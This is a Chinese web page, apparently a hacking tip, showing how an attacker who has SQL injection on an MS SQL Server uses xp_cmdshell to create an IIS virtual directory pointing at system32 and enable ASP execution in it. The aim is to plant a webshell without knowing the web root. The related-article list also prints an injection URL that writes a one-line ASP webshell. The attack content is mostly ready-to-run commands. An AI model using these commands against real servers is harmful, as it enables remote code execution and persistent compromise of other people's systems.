SQL注入建立虚拟目录,找Web绝对路径!
我们很多情况下都遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错:
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'
建立虚拟目录win,指向c:\winnt\system32
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'
让win句有解析asp脚本权限
exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/"
删除虚拟目录。
找不到web绝对路径的一种解决办法,
http://21o.net/h4x0r
403错误,表示虚拟目录建好了。。。
相关推荐
-
SQL注入建立虚拟目录,找Web绝对路径!
我们很多情况下都遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错: exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"' 建立虚拟目录win,指向c:\winnt\system32 exe
-
sql注入建立虚拟目录
sql注入建立虚拟目录,免得找web绝对路径---------------------------------------------------------------- 我们很多情况下都遇到sql注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错: exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l&qu
-
sql server注入建立虚拟目录的方法
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"' 建立虚拟目录win,指向c:\winnt\system32 exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.
-
CMD下建立虚拟目录的方法
以下是丑要饭的<web数据分离> web 和 数据分离,有Pcanywhere,数据库服务器有 IIS, cscript.exe c:\inetpub\adminscripts\adsutil.vbs get w3svc/1/serverbindings 得到第一个Web服务的端口 cscript.exe c:\inetpub\adminscripts\adsutil.vbs create w3svc/1/root/wodexi/ IisWebVirtualDir创建一个虚拟目录wode
-
最详细的SQL注入相关的命令整理 (转)第1/2页
1. 用^转义字符来写ASP(一句话木马)文件的方法: ? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';-- ? echo ^<%execute^(reques
-
用C语言winform编写渗透测试工具实现SQL注入功能
目录 用C语言winform编写渗透测试工具使SQL注入 一.SQL注入 二.实现步骤 三.代码实现 四.软件使用步骤 用C语言winform编写渗透测试工具使SQL注入 一.SQL注入 原理: SQL注入是指攻击者在Web应用程序中事先定义好的查询语句的结尾加上额外的SQL语句,这些一般都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作.(危害:盗取网站敏感信息.绕过验证登录网站后台.借助数据库的存储过程进行权限提升等操作).造成的原因是程序员在编写Web程序时,没有对浏览
-
一篇文章了解SQL注入漏洞
目录 SQL注入漏洞原理 SQL注入内容 注入条件 SQL注释符与注入流程 SQL注入分类 SQLMap 分类 接受请求类型区分 注入数据类型的区分 SQL注入思路 手工注入思路 SQL 详细注入过程 总结 SQL注入漏洞原理 漏洞原理 web页面源代码对用户提交的参数没有做出任何过滤限制,直接扔到SQL语句中去执行,导致特殊字符改变了SQL语句原来的功能和逻辑.黑客利用此漏洞执行恶意的SQL语句,如查询数据.下载数据,写webshell.执行系统命令以此来绕过登录权限限制等. 检测方法
-
PHP编程之设置apache虚拟目录
apache虚拟目录设置方法分享,供大家参考,具体内容如下 1.开启"虚拟目录配置文件"httpd-vhosts.conf 文件路径:\wamp\bin\apache\apache2.4.9\conf\extra\httpd-vhosts.conf 将以下配置: # Virtual hosts # Include conf/extra/httpd-vhosts.conf 改为: # Virtual hosts Include conf/extra/httpd-vhosts.co
-
C#创建IIS虚拟目录的方法
本文实例讲述了C#创建IIS虚拟目录的方法.分享给大家供大家参考.具体分析如下: DirectoryEntry是.Net给我们的一大礼物,他的名字我们就知道他的功能--目录入口.使用过ADSI的人都知道操作IIS,WinNT这些时,我们还需要提供他们的Path,操作IIS时,这个Path的格式为: 复制代码 代码如下: IIS://ComputerName/Service/Website/Directory ComputerName:即操作的服务器的名字,可以是名字也可以是IP,经常用的就是lo
-
数据库之SQL注入原理以及过程的简单介绍
1.产生SQL注入原因 开发代码的时候没有全面考虑到网络安全性,特别是在用户交互时,没有考虑到用户提交的信息中可能破坏数据库,没有对输入的数据进行合法的过滤.SQL 注入过程目的性是非常强的,其主要目标是 Web 应用的后台数据库,从数据库中获取信息和授予较高的权限,它先破坏数据库,再对数据库服务器进行破坏. 2.SQL注入原理 首先要了解web网站的架构: Web 网站架构,总体结构由 Web 服务器端.客户终端和通信协议三大部分组成. 表示层是指用户交互的界面.用户在使用时在表示层输入需求,
随机推荐
- 心情不好时做这25件事
- vue使用axios跨域请求数据问题详解
- 破解Vista登陆密码Shift按五下轻松
- CentOS 7.2.1511 编译安装Nginx1.10.1+MySQL5.7.14+PHP7.0.11
- java清除html转义字符
- java代码实现截图功能(屏幕截图)
- Java 8新特性 内建函数式接口详解
- 在ASP.NET 2.0中操作数据之十八:在ASP.NET页面中处理BLL/DAL层的异常
- asp.net 抓取网页源码三种实现方法
- 把大数据数字口语化(python与js)两种实现
- java script编程起步(第三课)
- python中字典dict常用操作方法实例总结
- win2008 iis7设置取消执行纯脚本权限图文步骤
- 两个INPUT同步输入的方法小结 兼容IE和firefox
- Android中Service和Activity相互通信示例代码
- apache 环境下 php 的配置注意事项
- AMX使用图解之经典插件
- golang的httpserver优雅重启方法详解
- PHP排序算法之冒泡排序(Bubble Sort)实现方法详解
- Java用正则对字符串进行处理并判断是否能转为数字